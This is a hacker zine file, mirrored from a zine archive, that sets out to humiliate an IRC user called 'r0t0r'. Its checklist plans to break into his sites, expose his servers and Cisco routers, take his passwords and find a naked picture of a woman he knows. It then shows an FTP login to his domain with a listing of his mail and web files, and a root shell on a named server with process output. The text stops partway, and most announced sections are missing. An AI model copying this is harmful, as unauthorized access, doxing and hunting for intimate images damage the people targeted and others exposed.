mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Zines/dikline/rotorownage.txt
2017-12-10 21:54:57 +00:00


_______ _______ _________ _______ _______
( ____ )( __ )\__ __/( __ )( ____ )
| ( )|| ( ) | ) ( | ( ) || ( )|
| (____)|| | / | | | | | / || (____)|
| __)| (/ /) | | | | (/ /) || __)
| (\ ( | / | | | | | / | || (\ (
| ) \ \__| (__) | | | | (__) || ) \ \__
|/ \__/(_______) )_( (_______)|/ \__/
_______ GOT _ _______ ______
( __ )|\ /|( ( /|( ____ \( __ \
| ( ) || ) ( || \ ( || ( \/| ( \ )
| | / || | _ | || \ | || (__ | | ) |
| (/ /) || |( )| || (\ \) || __) | | | |
| / | || || || || | \ || ( | | ) |
| (__) || () () || ) \ || (____/\| (__/ )
(_______)(_______)|/ )_)(_______/(______/
This little kid has been pissing off way too many people lately.
Time to put this to an end.
###################################################################
[1] r0t0r info
[2] Checklist
[3] Killerz.org gets owned
[4] matts.homeunix.net owned
[5] Logs of r0t0r making an ass out of himself
[6] r0t0r's roots, ciscos and passwords! =)
[7] KC and the sunshine band (Ok that was bad..)
[8] Conclusion
###################################################################
[1] This little kid wages stupid IRC wars and thinks he is leet just
because he can DoS attack.
No skills, no manners and no brain.
I'm amazed that nobody has owned this kid before, after all he is
the most pathetic loud mouth little junkie that you can find on IRC.
Well.. maybe not but he is pretty pathetic.
[2] r0t0r Check list
1. Own killerz
2. Own matts.homeunix.net
3. Find more shells and own them
4. Expose rotor as a fake and a drunk
5. Expose r0t0r's lame roots
6. Find his ciscos which he uses to DoS people
7. Get his passwords and see if I can find a naked pic of that girl he is messing around with.
I guess that's it for now. Let's get started
[3] He used to own "www.killerz.org" until that got taken over by #obs /
nesa / others(?)
But anyways.. let's log in and see what the dude has, shall we? =)
$ ftp killerz.org
Connected to killerz.org (69.50.184.178).
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 3 of 50 allowed.
220-Local time is now 14:59. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (killerz.org:root): killerz
331 User killerz OK. Password required
Password:
230-User killerz has group access to: killerz
230 OK. Current restricted directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls *
227 Entering Passive Mode (69,50,184,178,38,41)
150 Accepted data connection
-rw-r--r-- 1 32479 killerz 196079 Jan 13 01:17 FreeBSD.png
-rw-r--r-- 1 32479 killerz 2577 Jan 3 21:06 index.html
-rw-r--r-- 1 32479 killerz 1383 Mar 26 03:43 kscan.c
code:
drwxr-xr-x 2 32479 killerz 4096 Dec 19 19:07 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 507 Dec 19 19:07 coolPHP.txt
etc:
drwxr-x--- 3 32479 12 4096 Dec 17 13:09 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 0 Dec 17 13:00 .imapv4cp5c
-rw-r--r-- 1 32479 killerz 0 Dec 17 13:09 ftpquota
drwxr-x--- 2 32479 12 4096 Mar 28 01:29 killerz.org
mail:
drwxrwx--- 3 32479 12 4096 Apr 6 07:57 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-rw---- 1 32479 12 508 Jan 9 18:54 INBOX.Drafts
-rw-rw---- 1 32479 12 1351 Jan 9 21:14 INBOX.Sent
-rw-rw---- 1 32479 12 714071 Jan 9 18:58 INBOX.Trash
-rw-rw---- 1 32479 12 7203732 Apr 6 07:57 inbox
drwxr-xr-x 3 32479 12 4096 Dec 17 04:19 killerz.org
-rw-rw---- 1 32479 12 210853 Jan 9 18:53 neomail-trash
-rw-rw---- 1 32479 12 0 Dec 19 22:38 saved-messages
-rw-rw---- 1 32479 12 426549 Jan 9 18:54 sent-mail
public_ftp:
drwxr-xr-x 3 32479 killerz 4096 Dec 15 14:52 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:52 incoming
public_html:
drwxr-x--- 30 32479 99 4096 Apr 6 14:45 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 356 Dec 15 14:53 .htaccess
-rw-r--r-- 1 32479 killerz 332394 Mar 20 20:33 0x41.tgz
drwxr-xr-x 2 32479 killerz 4096 Jan 13 01:14 FreeBSD
-rw-r--r-- 1 32479 killerz 30720 Jan 28 12:29 FreeBSD.png
-rw-r--r-- 1 32479 killerz 458 Dec 31 03:33 LOL.html
-rw-r--r-- 1 32479 killerz 147448 Mar 28 04:58 Scan0007.jpg
-rw-r--r-- 1 32479 killerz 10240 Dec 17 13:14 Thumbs.db
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _private
drwxr-xr-x 4 32479 killerz 4096 Dec 15 14:53 _vti_bin
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_cnf
-rw-r--r-- 1 32479 killerz 1754 Dec 15 14:53 _vti_inf.html
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_log
drwxr-x--- 2 32479 99 4096 Mar 28 01:16 _vti_pvt
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_txt
drwxrwxrwx 5 32479 killerz 4096 Dec 31 01:36 abicons
-rw-r--r-- 1 32479 killerz 373 Dec 30 22:49 b4b0.php
-rw-r--r-- 1 32479 killerz 5307 Mar 31 14:21 c0n3ct.c
drwxr-xr-x 2 32479 killerz 4096 Dec 26 21:35 cam2
drwxr-xr-x 3 32479 killerz 4096 Dec 31 01:35 cgi-bin
drwxr-xr-x 2 32479 killerz 4096 Jan 9 22:39 code
drwxr-xr-x 5 32479 killerz 4096 Dec 25 15:16 cutenews
drwxr-xr-x 2 32479 killerz 4096 Dec 26 20:51 ebay
drwxr-xr-x 4 32479 killerz 4096 Dec 22 18:35 electronics
drwxr-xr-x 3 32479 killerz 4096 Mar 19 00:37 fileupload
drwxr-xr-x 2 32479 killerz 4096 Apr 4 21:43 fuck
-rw-r--r-- 1 32479 killerz 5298 Mar 21 17:45 hawe
drwxr-xr-x 2 32479 killerz 4096 Dec 24 04:09 images
-rw-r--r-- 1 32479 killerz 2568 Mar 19 01:22 index.php
drwxr-xr-x 2 32479 killerz 4096 Dec 17 13:13 index_files
drwxr-xr-x 3 32479 killerz 4096 Dec 19 19:51 irc
-rw-r--r-- 1 32479 killerz 921 Jan 4 03:58 kdoor.txt
-rw-r--r-- 1 32479 killerz 1776 Mar 24 05:16 klog.txt
-rw-r--r-- 1 32479 killerz 1994 Apr 5 02:31 kscan.c
drwxr-xr-x 2 32479 killerz 4096 Dec 17 14:49 music
-rw-r--r-- 1 32479 killerz 1390 Mar 20 02:56 netit
-rw-r--r-- 1 32479 killerz 5123 Mar 20 03:01 netstat.txt
drwxr-xr-x 4 32479 killerz 4096 Dec 24 03:20 newlay
-rw-r--r-- 1 32479 killerz 133435 Mar 22 02:55 newss.GIF
drwxr-xr-x 2 32479 killerz 4096 Dec 22 18:32 papers
drwxr-xr-x 4 32479 killerz 4096 Mar 18 23:46 pastebin
-rwxr-xr-x 1 32479 killerz 6625 Mar 18 23:47 pastebin.pl
drwxr-xr-x 10 32479 killerz 4096 Dec 17 13:01 phpBB
drwxr-xr-x 5 32479 killerz 4096 Jan 17 17:52 pics
-rw-r--r-- 1 32479 killerz 2448 Dec 15 14:53 postinfo.html
drwxr-xr-x 2 32479 killerz 4096 Mar 26 19:49 r00t
drwxr-xr-x 3 32479 killerz 4096 Mar 17 23:50 scamz
-rw-r--r-- 1 32479 killerz 2777 Mar 25 02:54 shelld.c
-rw-r--r-- 1 32479 killerz 1123 Mar 23 23:58 tsniff.txt
drwxr-xr-x 5 32479 killerz 4096 Mar 28 22:40 ~techg0d
tmp:
drwx------ 6 32479 killerz 4096 Dec 29 11:10 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
drwx------ 4 32479 killerz 4096 Apr 3 18:28 analog
drwx------ 2 32479 killerz 4096 Apr 3 18:28 awstats
-rw-r--r-- 1 32479 killerz 0 Apr 3 18:28 lastrun
-rw-r--r-- 1 32479 killerz 0 Apr 4 06:48 lastrun.bw
drwx------ 4 32479 killerz 4096 Apr 1 17:07 webalizer
drwx------ 2 32479 killerz 4096 Mar 18 02:04 webalizerftp
www:
drwxr-x--- 30 32479 99 4096 Apr 6 14:45 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 356 Dec 15 14:53 .htaccess
-rw-r--r-- 1 32479 killerz 332394 Mar 20 20:33 0x41.tgz
drwxr-xr-x 2 32479 killerz 4096 Jan 13 01:14 FreeBSD
-rw-r--r-- 1 32479 killerz 30720 Jan 28 12:29 FreeBSD.png
-rw-r--r-- 1 32479 killerz 458 Dec 31 03:33 LOL.html
-rw-r--r-- 1 32479 killerz 147448 Mar 28 04:58 Scan0007.jpg
-rw-r--r-- 1 32479 killerz 10240 Dec 17 13:14 Thumbs.db
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _private
drwxr-xr-x 4 32479 killerz 4096 Dec 15 14:53 _vti_bin
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_cnf
-rw-r--r-- 1 32479 killerz 1754 Dec 15 14:53 _vti_inf.html
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_log
drwxr-x--- 2 32479 99 4096 Mar 28 01:16 _vti_pvt
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_txt
drwxrwxrwx 5 32479 killerz 4096 Dec 31 01:36 abicons
-rw-r--r-- 1 32479 killerz 373 Dec 30 22:49 b4b0.php
-rw-r--r-- 1 32479 killerz 5307 Mar 31 14:21 c0n3ct.c
drwxr-xr-x 2 32479 killerz 4096 Dec 26 21:35 cam2
drwxr-xr-x 3 32479 killerz 4096 Dec 31 01:35 cgi-bin
drwxr-xr-x 2 32479 killerz 4096 Jan 9 22:39 code
drwxr-xr-x 5 32479 killerz 4096 Dec 25 15:16 cutenews
drwxr-xr-x 2 32479 killerz 4096 Dec 26 20:51 ebay
drwxr-xr-x 4 32479 killerz 4096 Dec 22 18:35 electronics
drwxr-xr-x 3 32479 killerz 4096 Mar 19 00:37 fileupload
drwxr-xr-x 2 32479 killerz 4096 Apr 4 21:43 fuck
-rw-r--r-- 1 32479 killerz 5298 Mar 21 17:45 hawe
drwxr-xr-x 2 32479 killerz 4096 Dec 24 04:09 images
-rw-r--r-- 1 32479 killerz 2568 Mar 19 01:22 index.php
drwxr-xr-x 2 32479 killerz 4096 Dec 17 13:13 index_files
drwxr-xr-x 3 32479 killerz 4096 Dec 19 19:51 irc
-rw-r--r-- 1 32479 killerz 921 Jan 4 03:58 kdoor.txt
-rw-r--r-- 1 32479 killerz 1776 Mar 24 05:16 klog.txt
-rw-r--r-- 1 32479 killerz 1994 Apr 5 02:31 kscan.c
drwxr-xr-x 2 32479 killerz 4096 Dec 17 14:49 music
-rw-r--r-- 1 32479 killerz 1390 Mar 20 02:56 netit
-rw-r--r-- 1 32479 killerz 5123 Mar 20 03:01 netstat.txt
drwxr-xr-x 4 32479 killerz 4096 Dec 24 03:20 newlay
-rw-r--r-- 1 32479 killerz 133435 Mar 22 02:55 newss.GIF
drwxr-xr-x 2 32479 killerz 4096 Dec 22 18:32 papers
drwxr-xr-x 4 32479 killerz 4096 Mar 18 23:46 pastebin
-rwxr-xr-x 1 32479 killerz 6625 Mar 18 23:47 pastebin.pl
drwxr-xr-x 10 32479 killerz 4096 Dec 17 13:01 phpBB
drwxr-xr-x 5 32479 killerz 4096 Jan 17 17:52 pics
-rw-r--r-- 1 32479 killerz 2448 Dec 15 14:53 postinfo.html
drwxr-xr-x 2 32479 killerz 4096 Mar 26 19:49 r00t
drwxr-xr-x 3 32479 killerz 4096 Mar 17 23:50 scamz
-rw-r--r-- 1 32479 killerz 2777 Mar 25 02:54 shelld.c
-rw-r--r-- 1 32479 killerz 1123 Mar 23 23:58 tsniff.txt
drwxr-xr-x 5 32479 killerz 4096 Mar 28 22:40 ~techg0d
## Well.. ftp access is good and all... but I want more
root@panther [/root]# uname -a; id
Linux panther.unixbsd.info 2.6.10-grsec #2 Sun Jan 9 16:59:21 PST 2005 i686
i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=XXXX(XXXXXXXXX) ## There we go! :)
root@panther [/tmp]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1540 500 ? S Apr04 0:06 init [3]
root 2 0.0 0.0 0 0 ? SWN Apr04 0:02 [ksoftirqd/0]
root 3 0.0 0.0 0 0 ? SW< Apr04 0:00 [events/0]
root 4 0.0 0.0 0 0 ? SW< Apr04 0:00 [khelper]
root 22 0.0 0.0 0 0 ? SW< Apr04 0:13 [kblockd/0]
root 52 0.0 0.0 0 0 ? SW Apr04 0:00 [kapmd]
root 72 0.0 0.0 0 0 ? SW Apr04 0:00 [pdflush]
root 75 0.0 0.0 0 0 ? SW< Apr04 0:00 [aio/0]
root 74 0.0 0.0 0 0 ? SW Apr04 0:54 [kswapd0]
root 662 0.0 0.0 0 0 ? SW Apr04 0:00 [kseriod]
root 767 0.0 0.0 0 0 ? SW Apr04 2:44 [kjournald]
root 1565 0.0 0.0 0 0 ? SW Apr04 0:00 [kjournald]
root 1911 0.0 0.0 0 0 ? SW Apr04 0:00 [khpsbpkt]
root 2633 0.0 0.0 1596 572 ? S Apr04 0:52 syslogd -m 0
root 2637 0.0 0.0 1548 496 ? S Apr04 0:01 klogd -x
root 2736 0.0 0.1 10516 2008 ? S Apr04 0:01
/usr/sbin/snmpd -s -l /dev/null -P /var/run/snmpd -a
root 4221 0.0 0.1 8520 1380 ? S Apr04 0:00 cupsd
root 4514 0.0 0.1 3668 1376 ? SN Apr04 0:11
/usr/sbin/sshd
root 4559 0.0 0.0 2152 796 ? S Apr04 0:01 xinetd
-stayalive -pidfile /var/run/xinetd.pid
postgres 4600 0.0 0.1 10960 1708 ? S Apr04 0:00
/usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data
postgres 4601 0.0 0.1 10244 1472 ? S Apr04 0:00 postgres:
stats buffer process
postgres 4602 0.0 0.1 9252 1512 ? S Apr04 0:00 postgres:
stats collector process
root 4605 0.0 0.1 7024 1644 ? SN Apr04 0:07 sshd:
root@pts/0
root 4626 0.0 0.1 7192 1936 ? S Apr04 0:06 chkservd
root 4690 0.0 0.1 5336 1284 pts/0 S Apr04 0:00 -bash
root 4724 0.2 0.7 43220 7812 ? S Apr04 13:31
/usr/sbin/clamd
mailnull 4735 0.0 0.1 6636 1752 ? SN Apr04 0:22
/usr/sbin/exim -bd -q60m
mailnull 4740 0.0 0.1 6636 1748 ? SN Apr04 0:00
/usr/sbin/exim -tls-on-connect -bd -oX 465
root 4746 0.0 0.1 2976 1492 ? S Apr04 4:10 antirelayd
root 4754 0.0 1.6 20188 17584 ? SN Apr04 1:53
/usr/local/apache/bin/httpd -DSSL
root 4762 0.0 0.3 11296 3484 ? SN Apr04 1:54 cppop -
accepting on port 110
root 4844 0.0 0.1 6932 1720 ? SN Apr04 0:01 pure-ftpd
(SERVER)
root 4847 0.0 0.0 6672 864 ? S Apr04 0:00
/usr/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/sbin/pureauth
root 4878 0.0 0.0 1612 668 ? S Apr04 0:00 crond
root 4894 0.0 0.0 5328 1028 ? S Apr04 0:00 /bin/sh
/usr/bin/mysqld_safe --datadir=/var/lib/mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid
xfs 4943 0.0 0.0 5100 736 ? S Apr04 0:00 xfs -droppriv
-daemon
mysql 4946 0.0 7.8 93980 81004 ? SN Apr04 0:36
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
daemon 4956 0.0 0.0 1592 560 ? S Apr04 0:00 /usr/sbin/atd
mysql 4963 0.0 7.8 93980 81004 ? SN Apr04 0:00
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 4971 0.0 7.8 93980 81004 ? SN Apr04 1:19
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 5132 0.1 7.8 93980 81004 ? SN Apr04 6:30
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 5375 0.0 7.8 93980 81004 ? SN Apr04 5:27
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mailnull 5376 0.0 0.3 5872 3448 ? SN Apr04 0:36 /usr/bin/perl
/usr/local/cpanel/bin/eximstats
mysql 5377 0.1 7.8 93980 81004 ? SN Apr04 6:01
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 5381 0.0 0.1 9528 1968 ? S Apr04 0:16 cpsrvd -
waiting for connections
mysql 5395 0.0 7.8 93980 81004 ? SN Apr04 5:18
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 5398 0.3 6.7 77676 69432 ? SN Apr04 21:43 cpanellogd -
setting up logs for vinniej
mysql 5403 0.0 7.8 93980 81004 ? SN Apr04 5:19
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 5404 0.0 0.1 8172 1624 ? SN Apr04 0:00 cppop -
accepting on port 110
nobody 5408 0.0 0.1 3444 1384 ? S Apr04 0:00 entropychat
nobody 5412 0.0 0.0 1904 884 ? SN Apr04 0:00
/usr/local/cpanel/bin/startmelange
cpanel 5442 0.0 0.1 36836 1888 ? SN Apr04 0:00
/usr/bin/stunnel-4.04local
/usr/local/cpanel/etc/stunnel/default/stunnel.conf
root 5470 0.0 0.0 1600 468 ? SN Apr04 0:00 jsvc.exec
-user tomcat -cp ./bootstrap.jar -Djava.endorsed.dirs=../common/endorsed
org.apache.catalina.startup.Bootstrap -debug -outfile ../logs/catalina.out
-errfile ..
tomcat 5471 0.0 1.3 244916 13680 ? SN Apr04 1:43 jsvc.exec
-user tomcat -cp ./bootstrap.jar -Djava.endorsed.dirs=../common/endorsed
org.apache.catalina.startup.Bootstrap -debug -outfile ../logs/catalina.out
-errfile ..
mailman 5476 0.0 0.2 7348 2100 ? SN Apr04 0:00
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/mailmanctl -s start
mailman 5489 0.0 0.2 7176 2164 ? SN Apr04 0:08
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=ArchRunner:0:1 -s
mailman 5490 0.0 0.2 7136 2192 ? SN Apr04 0:09
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=BounceRunner:0:1 -s
mailman 5491 0.0 0.2 7128 2112 ? SN Apr04 0:08
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=CommandRunner:0:1 -s
mailman 5492 0.0 0.2 7220 2164 ? SN Apr04 0:08
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=IncomingRunner:0:1 -s
mailman 5493 0.0 0.2 7216 2184 ? SN Apr04 0:08
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=NewsRunner:0:1 -s
mailman 5494 0.0 0.3 7320 4084 ? SN Apr04 0:09
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=OutgoingRunner:0:1 -s
mailman 5495 0.0 0.4 7176 4308 ? SN Apr04 0:11
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=VirginRunner:0:1 -s
mailman 5496 0.0 0.2 7176 2080 ? SN Apr04 0:00
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=RetryRunner:0:1 -s
root 5510 0.0 0.0 1700 716 ? S Apr04 0:00
/usr/sbin/portsentry -tcp
root 5531 0.0 0.0 1596 420 ? S Apr04 0:00 mdadm
--monitor --scan -f
root 5557 0.0 0.0 1532 400 tty1 S Apr04 0:00
/sbin/mingetty tty1
root 5558 0.0 0.0 1532 400 tty2 S Apr04 0:00
/sbin/mingetty tty2
root 5559 0.0 0.0 1532 400 tty3 S Apr04 0:00
/sbin/mingetty tty3
root 5560 0.0 0.0 1532 400 tty4 S Apr04 0:00
/sbin/mingetty tty4
root 5561 0.0 0.0 1532 400 tty5 S Apr04 0:00
/sbin/mingetty tty5
root 5562 0.0 0.0 1532 400 tty6 S Apr04 0:00
/sbin/mingetty tty6
named 6917 0.0 0.5 33080 5512 ? S Apr04 0:37
/usr/sbin/named -u named
mysql 14176 0.1 7.8 93980 81004 ? SN Apr04 6:48
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 18195 0.1 7.8 93980 81004 ? SN Apr04 6:28
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 4745 0.0 7.8 93980 81004 ? SN Apr05 4:51
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 15352 0.0 7.8 93980 81004 ? SN Apr05 4:47
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 27221 0.0 7.8 93980 81004 ? SN Apr05 4:44
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 27222 0.0 7.8 93980 81004 ? SN Apr05 5:07
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 27223 0.1 7.8 93980 81004 ? SN Apr05 5:50
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 27224 0.0 7.8 93980 81004 ? SN Apr05 4:46
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 29564 0.0 7.8 93980 81004 ? SN Apr05 5:20
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 31976 0.0 7.8 93980 81004 ? SN Apr05 3:21
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 2723 0.0 7.8 93980 81004 ? SN Apr05 3:13
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 13889 0.0 0.0 0 0 ? SW Apr06 0:22 [pdflush]
root 32694 0.0 0.2 6880 2128 ? SN Apr06 0:00 sshd:
root@pts/1
root 32711 0.0 0.1 5332 1344 pts/1 S Apr06 0:00 -bash
mysql 14337 0.0 7.8 93980 81004 ? SN Apr07 0:51
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14345 0.0 7.8 93980 81004 ? SN Apr07 0:54
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14349 0.0 7.8 93980 81004 ? SN Apr07 0:53
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14362 0.0 7.8 93980 81004 ? SN Apr07 0:52
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14363 0.0 7.8 93980 81004 ? SN Apr07 0:55
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14364 0.0 7.8 93980 81004 ? SN Apr07 0:52
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14365 0.0 7.8 93980 81004 ? SN Apr07 0:50
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14366 0.0 7.8 93980 81004 ? SN Apr07 0:51
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14367 0.0 7.8 93980 81004 ? SN Apr07 0:52
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14388 0.0 7.8 93980 81004 ? SN Apr07 0:50
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14432 0.0 7.8 93980 81004 ? SN Apr07 0:55
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14435 0.0 7.8 93980 81004 ? SN Apr07 0:56
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14436 0.0 7.8 93980 81004 ? SN Apr07 0:52
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14438 0.0 7.8 93980 81004 ? SN Apr07 0:54
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14439 0.0 7.8 93980 81004 ? SN Apr07 0:56
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14440 0.0 7.8 93980 81004 ? SN Apr07 0:53
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 14473 0.2 0.1 5352 1432 pts/0 S Apr07 5:20 top
root 13105 0.0 0.3 8100 3492 ? SN Apr07 0:00 /usr/bin/perl
/usr/local/cpanel/bin/leechprotect
nobody 13106 0.1 2.2 26460 22936 ? SN Apr07 1:53
/usr/local/apache/bin/httpd -DSSL
nobody 13107 0.1 1.8 21436 19128 ? SN Apr07 2:12
/usr/local/apache/bin/httpd -DSSL
nobody 13108 0.1 1.8 22068 19616 ? SN Apr07 2:00
/usr/local/apache/bin/httpd -DSSL
nobody 13124 0.1 2.6 32388 27596 ? SN Apr07 1:58
/usr/local/apache/bin/httpd -DSSL
nobody 13125 0.1 2.2 27076 23312 ? SN Apr07 1:47
/usr/local/apache/bin/httpd -DSSL
nobody 13197 0.1 2.3 28160 24228 ? SN Apr07 1:56
/usr/local/apache/bin/httpd -DSSL
